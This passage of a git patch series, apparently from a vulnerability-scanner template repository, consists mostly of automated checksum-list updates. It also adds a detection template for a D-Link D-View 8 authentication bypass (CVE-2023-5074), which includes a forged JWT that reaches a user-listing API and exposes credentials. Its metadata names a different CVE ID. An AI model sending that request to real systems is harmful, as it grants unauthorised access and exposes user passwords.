+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
-http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
-http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
-http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
+http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7188,7 +7189,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:9cecda08b42e6518f6e40d6b243f7e2dda1a8ba8
+templates-checksum.txt:41864dd05cd6b5127a09da2d30a21c1b795476d2
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From dee8504ac14338f35e39bbce8249396c264b9f2d Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 13:16:00 +0000
Subject: [PATCH 0532/1090] Auto Generated New Template Addition List [Tue Sep
 26 13:16:00 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 60a64e9e4d..fcd9002627 100644
--- a/.new-additions
+++ b/.new-additions
@@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-4568.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml
 http/misconfiguration/installer/akeeba-installer.yaml
 http/misconfiguration/installer/alma-installer.yaml
+http/misconfiguration/installer/bitrix24-installer.yaml
 http/misconfiguration/installer/gibbon-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml
 http/misconfiguration/installer/zabbix-installer.yaml

From 25e7de07cab38a541b178b0c0c6d2719a6c0e874 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 13:16:06 +0000
Subject: [PATCH 0533/1090] Auto Generated Templates Checksum [Tue Sep 26
 13:16:06 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 014c3b9703..a27614bad3 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -4480,6 +4480,7 @@ http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml:46a5c397b2f9d
 http/misconfiguration/installer/avideo-install.yaml:98964c7f04afc20db0e4b56e508439b7b596cd26
 http/misconfiguration/installer/bagisto-installer.yaml:f33130e67be12f52d3e719eba69c9bcf02cf8b19
 http/misconfiguration/installer/binom-installer.yaml:5a0bda002247c3c4f299124b776e7de31d4ff5ca
+http/misconfiguration/installer/bitrix24-installer.yaml:6ad2faf66db30c2430ed12cbc3a5de6f1d64badf
 http/misconfiguration/installer/blesta-installer.yaml:9bb3ce964212c9aeae365fe58ca43104b3ee2006
 http/misconfiguration/installer/circarlife-setup.yaml:2e1e2902cfeeb14c1ad2193c41f458af2347e092
 http/misconfiguration/installer/cloudcenter-Installer.yaml:d0a27daa30662ca704278975f2d42cb0674fe479
@@ -7189,7 +7190,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:41864dd05cd6b5127a09da2d30a21c1b795476d2
+templates-checksum.txt:ea287ca66e14c3e14e69c6936957992bac2d98eb
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From ca82560704395fe3310b920dc7cf301757c4bc71 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 13:28:17 +0000
Subject: [PATCH 0534/1090] Auto Generated New Template Addition List [Tue Sep
 26 13:28:16 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index fcd9002627..84b7c24a95 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,5 @@
 http/cves/2023/CVE-2023-2766.yaml
+http/cves/2023/CVE-2023-36845.yaml
 http/cves/2023/CVE-2023-42442.yaml
 http/cves/2023/CVE-2023-4568.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml

From 29b98050f5255ab6c420b87a6485e9cbea4b6c2c Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 13:28:26 +0000
Subject: [PATCH 0535/1090] Auto Generated Templates Checksum [Tue Sep 26
 13:28:26 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index a27614bad3..dbd962a9a8 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2625,6 +2625,7 @@ http/cves/2023/CVE-2023-36287.yaml:1bd4556b22ed1735e6520f1863d7042c2887cdad
 http/cves/2023/CVE-2023-36289.yaml:2b72a9da5b1fcd84e96c5dd215aeda4b1e6b1e1b
 http/cves/2023/CVE-2023-36346.yaml:5ee129e53dabeed62e34ccb3a09d2ed54738e5bb
 http/cves/2023/CVE-2023-36844.yaml:9e86fa9e1151f89573be9f7d770300ffcc62b8ed
+http/cves/2023/CVE-2023-36845.yaml:22b77d7c8ecc6eb7db666839fe3cf43bff67b5d2
 http/cves/2023/CVE-2023-36934.yaml:4c03fc9e5a31a62397b5254823bf42c980d470e8
 http/cves/2023/CVE-2023-37265.yaml:4055559adf504d389bb3b7b7de7de1da855e4fcf
 http/cves/2023/CVE-2023-37266.yaml:c0f54d30b78925c846255def26f14f293483af19
@@ -7190,7 +7191,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:ea287ca66e14c3e14e69c6936957992bac2d98eb
+templates-checksum.txt:32df3f27ae6ebb7d4b1b381eb3b4817b05194928
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 7d10de74778643cbd59e3ea5bfbc0927162f9d1c Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 13:40:20 +0000
Subject: [PATCH 0536/1090] Auto Generated New Template Addition List [Tue Sep
 26 13:40:20 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 84b7c24a95..702c5ee701 100644
--- a/.new-additions
+++ b/.new-additions
@@ -8,5 +8,6 @@ http/misconfiguration/installer/alma-installer.yaml
 http/misconfiguration/installer/bitrix24-installer.yaml
 http/misconfiguration/installer/gibbon-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml
+http/misconfiguration/installer/ojs-installer.yaml
 http/misconfiguration/installer/zabbix-installer.yaml
 http/technologies/blazor-webassembly-detect.yaml

From 68c7eb7acde07fe0605f56a9de2a2a8c7a3cf7d8 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 13:40:22 +0000
Subject: [PATCH 0537/1090] Auto Generated Templates Checksum [Tue Sep 26
 13:40:22 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index dbd962a9a8..c58d17cb1e 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -4522,6 +4522,7 @@ http/misconfiguration/installer/netsparker-enterprise-installer.yaml:d9b8f35bbf4
 http/misconfiguration/installer/nginx-auto-installer.yaml:a45c4bc03311eb33170957d65fa62b0a194427d6
 http/misconfiguration/installer/nodebb-installer.yaml:7a5df25da7163e43f58532154f602652d0b013cc
 http/misconfiguration/installer/nopcommerce-installer.yaml:4568895e83d6888dd2e4eefb6df641258b227f79
+http/misconfiguration/installer/ojs-installer.yaml:a8737d5a86376bda445e5fe2c141143a79cf5e29
 http/misconfiguration/installer/openmage-install.yaml:4aa42695d5062c627d4290348a5459f57ecf5a14
 http/misconfiguration/installer/openshift-installer-panel.yaml:d8a752d34b8064b82613b1fdd6c70c3dc16bb6ff
 http/misconfiguration/installer/opensis-installer.yaml:b2b80ff3af51a7ccc9f2f70da8853f4a4ac0b85a
@@ -7191,7 +7192,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:32df3f27ae6ebb7d4b1b381eb3b4817b05194928
+templates-checksum.txt:c231fe51c6ebce79078483d2407f8f3ba3cefd42
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 8624a3723bc7a49d73877d513ee72db9aff461da Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 13:42:18 +0000
Subject: [PATCH 0538/1090] TemplateMan Update [Tue Sep 26 13:42:18 UTC 2023]
 :robot:

---
 http/misconfiguration/installer/ojs-installer.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/misconfiguration/installer/ojs-installer.yaml b/http/misconfiguration/installer/ojs-installer.yaml
index ac1e65b86d..e11a8597f3 100644
--- a/http/misconfiguration/installer/ojs-installer.yaml
+++ b/http/misconfiguration/installer/ojs-installer.yaml
@@ -5,9 +5,9 @@ info:
   author: DhiyaneshDK
   severity: high
   metadata:
-    max-request: 1
-    verified: true
+    max-request: 2
     shodan-query: http.favicon.hash:2099342476
+    verified: true
   tags: misconfig,ojs,install,exposure
 
 http:

From 52c9d36132be16f932a72b3a3f8c9b90e44d53e6 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Tue, 26 Sep 2023 20:05:39 +0530
Subject: [PATCH 0539/1090] Create CVE-2023-5074.yaml

---
 http/cves/2023/CVE-2023-5074.yaml | 44 +++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-5074.yaml

diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml
new file mode 100644
index 0000000000..456ecf8740
--- /dev/null
+++ b/http/cves/2023/CVE-2023-5074.yaml
@@ -0,0 +1,44 @@
+id: CVE-2023-5074
+
+info:
+  name: Authentication Bypass in D-Link D-View 8
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28
+  remediation: |
+    Upgrade to the latest version to mitigate this vulnerability.
+  reference:
+    - https://www.tenable.com/security/research/tra-2023-32
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-5074
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-0563
+    cwe-id: CWE-798
+    epss-score: 0.00563
+    epss-percentile: 0.74832
+    cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.favicon.hash:-1317621215
+    fofa-query: icon_hash="-1317621215"
+    vendor: dlink
+    product: d-view_8
+  tags: cve,cve2023,d-link,auth-bypass
+
+http:
+  - raw:
+      - |
+        GET /dview8/api/usersByLevel HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")'
+          - 'contains(header, "application/json")'   
+        condition: and

From e48aa75f0f756f6a0500e78f27c17b8a74f75822 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Tue, 26 Sep 2023 20:09:49 +0530
Subject: [PATCH 0540/1090] fix-trail-spacing

---
 http/cves/2023/CVE-2023-5074.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml
index 456ecf8740..46e76b4bf8 100644
--- a/http/cves/2023/CVE-2023-5074.yaml
+++ b/http/cves/2023/CVE-2023-5074.yaml
@@ -40,5 +40,5 @@ http:
         dsl:
           - 'status_code == 200'
           - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")'
-          - 'contains(header, "application/json")'   
+          - 'contains(header, "application/json")'
         condition: and

From e86f0d7b5ba1880d8634d8423b84d0788c9848f9 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 15:40:23 +0000
